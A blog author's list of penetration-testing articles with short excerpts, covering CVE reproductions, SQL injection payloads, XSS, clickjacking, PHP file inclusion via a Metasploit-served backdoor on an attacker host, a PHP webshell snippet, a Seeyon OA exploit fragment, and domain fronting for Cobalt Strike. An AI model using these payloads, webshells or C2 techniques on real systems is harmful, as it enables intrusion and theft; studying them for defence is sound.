小韩韩啊
主业信息安全!
会python,懂php,java,会mysql基本操作。
懂产品设计,会写产品方案,会seo,会逆向,
会售前售后,
会一点安全运营,
会一点点运维,
的一条安全dog。
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)分析与复现
说白了其实就是windows对于不同编码字符集之间转化的一个特性,可能大家对于Best-Fit很陌生,如果换一个词叫做宽字节,我想大家就会很熟悉了,说白了就是。原创 2024-06-24 14:15:03 · 381 阅读 · 0 评论 -
PbootCMS 前台RCE漏洞复现
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要PbootCMS v原创 2024-06-24 14:00:28 · 1524 阅读 · 0 评论 -
渗透测试-上传漏洞
黑名单顾名思义,当开发人员禁止用户上传某类型的文件的时候就可以通过黑名单设置,如禁止用户上传php或jsp文件,此方法较为鸡肋,因为需要开发人员具备一定的安全意识,了解足够多的风险文件扩展名(PS:有安全意识的开发几乎不会选择黑名单拦截方法,因为这是不明智的选择)。对应文件类型还有很多,很多开发在写上传的时候会验证用户上传文件类型,这个可时候我们可以使用其他的文件类型上传我们想要上传的文件,如:使用jpg的文件类型,上传php的文件。在很多时候上传的文件验证了文件头内容,如我们常用的PNG文件开头则是。原创 2022-09-07 05:59:05 · 368 阅读 · 0 评论 -
渗透测试-CSRF漏洞
跨站请求伪造(Cross-Site Request Forgery,CSRF)是一种使已登录用户在不知情的情况下执行某种动作的攻击。因为攻击者看不到伪造请求的响应结果,所以CSRF攻击主要用来执行动作,而非窃取用户数据。当受害者是一个普通用户时,CSRF可以实现在其不知情的情况下转移用户资金、发送邮件等操作;但是如果受害者是一个具有管理员权限的用户时CSRF则可能威胁到整个Web系统的安全。原创 2022-09-06 10:44:11 · 825 阅读 · 0 评论 -
渗透测试-sql注入漏洞
在应用中,通常为了安全,开发者会开启PHP的magic_quotes_gpc,或者是addslashes、mysql_real_escape_string等函数对客户端传染到的参数没有进行过滤,则注入的单引号或双引号就会被“\”转义,但是,如果服务器端的数据库使用的是GB2312、GBK、GB18030等宽字节的编码是,则依然会造成注入。id=1%df%5c%27,这个%27则是单引号的编码,在这种情况下%df%5c在GBK编码中是繁体字運,这样就成功闭合掉了转义后的\,这样就可以成功使’闭合。原创 2022-09-06 10:29:12 · 490 阅读 · 0 评论 -
渗透测试-命令执行漏洞
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。这里还是主要以PHP为主介绍命令执行漏洞,Java等应用的细节待补充。原创 2022-09-06 10:23:44 · 623 阅读 · 0 评论 -
YKfaka优卡自动发卡程序漏洞合集(这是篇水文)
alert(/xss/)原创 2022-08-09 12:02:08 · 3428 阅读 · 0 评论 -
XSS跨站脚本攻击
存储型XSS也被称之为持久型XSS,相比于反射型XSS危害更大,存储型XSS不需要用户访问特定的url地址,就能执行XSS恶意代码,主要是由于攻击者提前将恶意的xss代码注入到了应用中或存储到了相关数据库中,在用户访问页面的时候即可被调用或从数据库读取出来。在请求链接中页面传递了kehai参数,在课嗨参数中,未对用户输入进行过滤,导致在kehai参数中带有了标签并且该标签内的alert函数被触发,弹出内容为xss的提示框。...原创 2022-07-16 23:59:06 · 1930 阅读 · 0 评论 -
weblogic LDAP远程代码执行 CVE-2021-2109
漏洞影响版本WebLogic Server 10.3.6.0.0WebLogic Server 12.1.3.0.0WebLogic Server 12.2.1.3.0WebLogic Server 12.2.1.4.0WebLogic Server 14.1.1.0.0漏洞复现搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境访问http://192.168.2.131:7001,出现以下界面说明搭建成功访问以下路径,如果原创 2022-02-01 10:35:21 · 2335 阅读 · 0 评论 -
黑盒判断FastJson组件
判断方法个人总结有以下四种:1. 响应报错 如果站点响应结果中会将代码控制台的错误结果回显,就可以用不闭合括号、引号等方式进行报错回显,报错结果中可以通过 类的包名判断是哪个json组件 com.alibaba.fastjson.JSONException com.fasterxml.jackson.databind.xxxxxxxxx 2. 支持额外属性的特性 fastjson支持类对象以外的属性获取,而jackson不支持,可以在测试时可以通过添加额外的参数值,查看是不否报原创 2022-01-26 12:48:00 · 1466 阅读 · 0 评论 -
xray poc-yaml-joomla-cve-2018-7314-sql
漏洞描述Joomla!是美国OpenSourceMatters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。PrayerCenter是使用在其中的一个祷告分享组件。Joomla!PrayerCenter3.0.2版本中存在SQL注入漏洞。远程攻击者可借助‘sessionid’参数利用该漏洞查看、添加、更改或删除后端数据库中的信息。SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla!原创 2022-01-20 12:19:13 · 3707 阅读 · 0 评论 -
点击劫持漏洞原理及利用包含修复建议
今天群里有人问如何查看是否存在点击劫持漏洞,我们首先了解下漏洞是如何产生的,点击劫持漏洞是因为网站未对referer来源进行验证导致的。具体测试及利用的话我们可以用iframe制作一个透明标签在上面:案例:<!DOCTYPE HTML><html><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><head><title>点击劫持<原创 2022-01-12 14:17:49 · 4046 阅读 · 0 评论 -
网络扫描 nmap 和 Metasploit 数据转换
自带Metasploit里面能自动导入,启动MSF并且连接数据库 删除久数据root@Ubuntu:~# msfconsole -y /1.yml msf > hosts -dHosts=====address mac name os_name os_flavor os_sp purpose info comments-------原创 2021-11-18 01:50:02 · 445 阅读 · 0 评论 -
邮件伪造利用
我们以10086的网站作为测试,缺少SPF的设置检测:http://old.openspf.org/wizard.html或者:nslookup -type=txt XXX.cn我们先来说下如果说可以任意邮件伪造的话首先我们知道的利用方式:钓鱼 认证信息 诈骗…..等 后面自己发挥想象力!但是在目前国内安全形势来看的话,这一漏洞最好利用在漏洞平台厂商认证上面。部署邮件服务器:准备工具: 外网服务器一台(目前国内所有机房禁用了邮箱端口所以不行) winmail...原创 2021-11-18 01:47:05 · 740 阅读 · 0 评论 -
PHP文件包含漏洞 Metasploit
原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt然后/lfi.php?file=http://5.5.5.3:1111/1.txt启动METASPLOITmsf > use exploit/unix/webapp/php_include msf exploit(php_include) > set RHOST 5.5.5.2RHOST => 5.5.5.2msf exploit(php_in原创 2021-11-13 04:46:11 · 2280 阅读 · 0 评论 -
PHP文件包含漏洞 日志
一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读我们可以包含日志在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E这样肯定会报出错找不到页面,而一出错就被记在错误日志里了http://xxx.com/z.php?zizzy=/home/user/www.xxx.原创 2021-11-13 04:44:37 · 356 阅读 · 0 评论 -
PHP文件包含漏洞 3 fimap
安装插件root@Ubuntu:/pen/web/fimap/src# ./fimap.py -Ifimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!):: Automatic LFI/RFI scanner and exploiter:: by Iman Karim ([email protected])Requesting list of plugins...等待一下选择Requesting list of原创 2021-11-13 04:40:50 · 369 阅读 · 0 评论 -
PHP文件包含漏洞 2 fimap
root@Ubuntu:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap扫描一下:root@Ubuntu:/pen/web# cd fimap/src/root@Ubuntu:/pen/web/fimap/src# ./fimap.py -u "http://5.5.5.3/lif.php?file=info.php" --enable-blindfimap v.1.00_svn (Uitmuntende .原创 2021-11-13 04:36:58 · 218 阅读 · 0 评论 -
PHP文件包含漏洞
涉及到的危险函数〔include(),require()和include_once(),require_once()〕 include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是这样。漏洞代码:root@ubuntu:/var/www# cat lif.php <原创 2021-11-13 04:33:12 · 278 阅读 · 0 评论 -
Flash CSRF
目录0x00 Flash CSRF名词解释0x01 Flash CSRF形成的原因0x02 如何来发现哪些地方存在Flash CSRF0x02 Flash CSRF可以干些什么0x03 Flash CSRF如何利用0x04 Flash CSRF怎么防御0x00 Flash CSRF名词解释CSRF(Cross-site request forgery跨站请求伪造,是一种对网站的恶意利用,CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。Flash CSRF通常是由原创 2021-09-09 01:17:56 · 246 阅读 · 0 评论 -
某SSC模板通杀漏洞
目录0x1漏洞位置0x2漏洞利用0x3 漏洞关键词0x1漏洞位置该漏洞位置位于ssc后台,为登陆处延时注入。0x2漏洞利用在登陆过程中抓包获取相关http请求包:POST /Public.login.do HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0Content-Length: 223Accept: text/html,原创 2021-07-27 13:38:15 · 515 阅读 · 0 评论 -
用于扫描器规则的sql注入判断方法
测试语句-用于扫描器规则#布尔盲注payload单引号注入法第一优先级(正常布尔判断) 正确时 错误时 ''''''''(8个单引号) '''''''(7个单引号) ' and 1=1 and 'a'='a ' and 1=2 and 'a'='a '-'0 '-'1 %' and 1=1 and '%'=' %' and 1=2 and '%'=' ' or 'a'...原创 2021-06-20 18:57:32 · 256 阅读 · 0 评论 -
常见端口及检查方式
端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持/欺骗 110 pop3 爆破/嗅探 139 Samba服务..原创 2021-06-20 18:55:20 · 239 阅读 · 0 评论 -
资产探测及信息收集
0x001基础语法:1.语法说明:inurl: 在url地址栏中显示的信息页面intext: 显示在正文信息中的内容页面site: 限制显示你某个域名的所有页面filetype: 搜索文件的后缀或者扩展名intitle: 限制你搜索的网页标题页面link: 将显示有到指定网页的链接的网页cache:将显示在Google cache中的网页allintitle: 搜索所有关键字构成标题的网页.(allintite:关键字或者url地址)2.操作符说明: +把...原创 2021-06-20 18:52:59 · 250 阅读 · 0 评论 -
CRLF Injection (CRLF注入)
漏洞简介CRLF是”回车 + 换行”(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦能够控制HTTP 消息头中的字符,注入一些恶意的换行,这样就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting,简称HRS。HRS是比XSS危害更大的安全问题。形成原理在HTTP协议中,HTTP头是通过”\r\..原创 2021-06-20 14:27:22 · 1520 阅读 · 0 评论 -
多种php后门
一句话过狗小马<?php //pwd=iChinafunction payload($cmd,$pwd,$func){ //执行命令 if ($pwd=='c256b667c0bfd5b0cd0f0e77976a37e7') { $array = array($func,"iChina","Secquan.org"); $result = $array[0]($cmd); echo $result; } else原创 2021-06-13 06:14:32 · 180 阅读 · 0 评论 -
MySQL不知道列名情况下的注入
0×01 前提以下情况适用于 Mysql < 5版本,或者在 Mysql >= 5 的版本[存在information_schema库],且已获取到库名和表名① 当只能获取到表名,获取不到列名或者只能获取到无有效内容的列名情况【例如 id】② 当希望通过information_schema库中的表去获取其他表的结构,即表名、列名等,但是这个库被WAF过滤掉的情况其实个人感觉这个方法还是对 5 版本以下的实用性比较强一些,因为对我来说,一般遇到waf就放弃了(菜的真实23333..原创 2021-06-13 06:09:39 · 171 阅读 · 0 评论 -
网康科技-下一代防火墙 rce
loudon利用jar包: https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE.jar原创 2021-06-01 21:27:53 · 569 阅读 · 0 评论 -
centos7 安装灯塔arl docker
目录安装docker:安装Docker Compose:下载进入目录启动:解决db报错问题:安装docker:yum install docker安装Docker Compose:curl -L "https://github.com/docker/compose/releases/download/1.23.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose.原创 2021-05-21 01:47:36 · 1145 阅读 · 0 评论 -
云豹直播SQL注入漏洞
目录注入一:注入二:注入一:文件位置:/application/Home/Controller/PlaybackController.class.php注入链接:http://www.xxx.com/index.php?g=Home&m=Playback&touid=1经测试,目标并不存在此处注入。注入二:文件位置:/application/Appapi/Controller/VideoController.class.php注入链接:ht原创 2021-05-13 07:14:21 · 500 阅读 · 0 评论 -
免费域名cs的域前置上线
目录注册域名注册邮箱注册域名国内各个公司大佬都习惯用自己的.com或者.cn、.net域名上线,早年各位白嫖的时候都知道有tk域名是免费域名,还有那种免费空间建站。这里用到的就是免费域名tk域名。其他免费域名需要各位自己查找~http://www.jm.cn/?t=xx_8486或者可以百度搜索:https://www.baidu.com/baidu?tn=monline_4_dg&ie=utf-8&wd=.tk%E5%9F%9F%E5%90%8D%E5%85%8原创 2021-05-13 03:02:46 · 1155 阅读 · 0 评论 -
致远OA任意文件上传
1)通过请求直接获取管理员权限cookie2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshelldef seeyon_new_rce(targeturl):orgurl=targeturl#通过请求直接获取管理员权限cookie targeturl=orgurl+'seeyon/thirdpartyController.do'post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmc原创 2021-05-10 21:52:33 · 2191 阅读 · 0 评论 -
Apache Shiro 两种姿势绕过认证分析(CVE-2020-17523)
目录0x01 漏洞描述0x02 漏洞环境搭建0x03 poc测试0x04 漏洞分析4.1 空格绕过分析4.2 /./绕过分析0x01 漏洞描述Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。当它和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。.原创 2021-05-07 23:42:07 · 462 阅读 · 0 评论 -
fofa爬虫(刷漏洞平台好方法)
目录说明:代码配置说明:支持多关键词爬虫,适合于rad+xray联动。关键词一行一个,fofa.txt文本内容为关键词,target内容为结果,直接与Xray_Rad_Fusion放在同一个目录下执行即可联动。代码import requests,os,sys,base64,json,refrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.url原创 2021-05-01 03:09:47 · 2420 阅读 · 2 评论 -
通达oa SQL注入day
最近看爆出了很多day,手上握着的几个泛微,致远都被爆出来了,寻思也发一个通达的,但是通达的爆出来的太多了,我不知道这个有没有被公开,所以也不知道算0day还是xday。主要问题点在pda/appcenter/submenu.php文件中,appid参数,获取其他得小伙伴们应该都懂了。...原创 2021-04-17 19:22:02 · 465 阅读 · 0 评论